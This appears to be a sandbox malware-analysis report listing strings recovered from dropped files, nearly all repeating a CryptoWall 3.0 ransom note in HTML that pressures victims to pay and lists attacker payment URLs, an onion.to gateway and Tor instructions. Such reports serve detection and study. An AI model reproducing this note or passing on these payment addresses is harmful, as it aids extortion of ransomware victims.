Source: restore_files_gpmus.html42.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for 
other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt29.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt324.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt6.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt131.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html224.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching 
for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html80.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for 
other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html233.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching 
for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt151.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt124.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html333.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching 
for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html8.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for 
other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html129.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching 
for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html180.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching 
for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html382.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching 
for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt209.2.dr String found in binary or memory: Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html166.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching 
for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html406.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching 
for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html249.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching 
for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt231.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
